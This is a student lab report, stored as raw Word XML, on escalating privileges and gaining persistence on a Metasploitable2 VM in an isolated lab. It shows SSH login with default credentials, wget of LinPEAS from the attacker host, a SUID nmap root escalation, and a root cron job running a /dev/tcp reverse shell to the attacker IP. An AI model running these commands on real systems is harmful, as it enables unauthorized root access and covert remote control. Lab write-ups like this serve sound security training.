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F4AA" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Privilege Escalation and Persistence Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F37E697" w14:textId="30DBA4BF" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Student Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Prakanth</w:t>
      </w:r>
      <w:r w:rsidR="00CE425F">
        <w:t xml:space="preserve"> V</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Privilege Escalation and Persistence (Linux)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target VM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target IP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> 192.168.80.132</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker VM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E95F79D" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="499657C3">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4903D3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1. Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E247B8F" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>The objective of this lab is to enumerate a vulnerable Linux system, escalate privileges using SUID misconfigurations identified by LinPEAS, and establish persistence using a cron job. All actions were performed in an isolated lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A508D8" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="27B1A643">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5135E4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2. Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D2320" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker OS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D895E6A" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target OS:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Metasploitable2 (Ubuntu 8.04)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7CF8A" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Host-Only Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E1C278" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve"> Nmap, SSH, LinPEAS, GTFOBins techniques, Cron</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EE2731" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="65442AAF">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40628C72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3. Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2BED1" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>The target machine was discovered using an Nmap ping sweep on the host-only network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274F23C1" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B7610" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>nmap -sn 192.168.80.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CFA37" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380479B6" w14:textId="0FDC7F92" w:rsidR="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Discovered target host at 192.168.80.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E73C00" w14:textId="48CC159F" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5866496E" wp14:editId="1AF1769F">
            <wp:extent cx="4732430" cy="2453853"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="67957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79389" name="Picture 6795793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17F5" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="03266D52">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9C780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4. Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75576DDC" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>SSH access was attempted using the default Metasploitable2 credentials. Due to legacy SSH algorithms, modern SSH required explicit allowance of ssh-rsa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E9492" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E36846C" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa msfadmin@192.168.80.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8305D8" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983E471" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Username: msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFAD01" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Password: msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCACB2" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679FE63" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Successfully obtained a low-privileged shell as user msfadmin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120C7A5" w14:textId="0A0742D3" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5554A226" wp14:editId="769DFDAA">
            <wp:extent cx="5731510" cy="3061335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="441226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26807" name="Picture 4412268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B51AC" wp14:editId="6D948ACE">
            <wp:extent cx="5731510" cy="3049270"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1811484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84831" name="Picture 18114848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012C" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="743C8BEC">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71D4F7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5. Enumeration with LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D03FBB8" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>LinPEAS was transferred from the attacker machine to enumerate privilege escalation vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCA294" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali (Attacker) Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755CE5A" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA0A38" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C6D0AC" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>wget http://192.168.80.131:8000/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A403785" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:lastRenderedPageBreak/>
        <w:t>chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EA569" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C7A8B" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743618AF" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Multiple SUID binaries present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DEAE2" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>/usr/bin/nmap identified as SUID-root and exploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008BCF0" w14:textId="4624C508" w:rsidR="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5D483A" wp14:editId="5C16B116">
            <wp:extent cx="5731510" cy="3052445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1579144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44506" name="Picture 15791445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5C41B2" wp14:editId="4612D8DF">
            <wp:extent cx="5731510" cy="3073400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1455295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95662" name="Picture 14552956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01D2" w14:textId="08D7404F" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44CABF16" wp14:editId="0011CDDA">
            <wp:extent cx="5731510" cy="3058795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1432699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99939" name="Picture 14326999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1F0D" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="51D0D239">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C503B9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6. Privilege Escalation (SUID Exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192CAD6C" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>Using LinPEAS results, the SUID-enabled nmap binary was exploited via its interactive mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6205BA36" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C58961" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>nmap --interactive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053406F7" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>!sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FBD21A" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7F4E7" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B2A5D" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D539EE" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C3AF3" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Root shell successfully obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0E4DCC" w14:textId="5459C7C1" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135129AF" wp14:editId="754C02BC">
            <wp:extent cx="5731510" cy="3052445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1615956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56782" name="Picture 16159567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7CEC" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="531DBE6E">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03846692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7. Privilege Escalation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338"/>
        <w:gridCol w:w="1676"/>
        <w:gridCol w:w="938"/>
        <w:gridCol w:w="1129"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A6014F" w:rsidRPr="00A6014F" w14:paraId="51AB1F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F93D5" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A6014F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32B70CF9" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A6014F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37987F2" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A6014F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5861206F" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A6014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263424" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A6014F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6014F" w:rsidRPr="00A6014F" w14:paraId="77599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08DD" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:r w:rsidRPr="00A6014F">
              <w:t>010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEED94F" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:r w:rsidRPr="00A6014F">
              <w:t>SUID Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59136910" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:r w:rsidRPr="00A6014F">
              <w:t>192.168.80.132</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58B281F3" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:r w:rsidRPr="00A6014F">
              <w:t>Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533019C6" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
            <w:r w:rsidRPr="00A6014F">
              <w:t>Root Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="437F2A25" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="371F671D">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00809D65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8. Persistence Mechanism (Cron Job)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122D7E6" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>Persistence was established by creating a root-level cron job that executes a reverse shell script periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C172D8" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F70B4" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307397FC" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.80.131/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A7C48" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
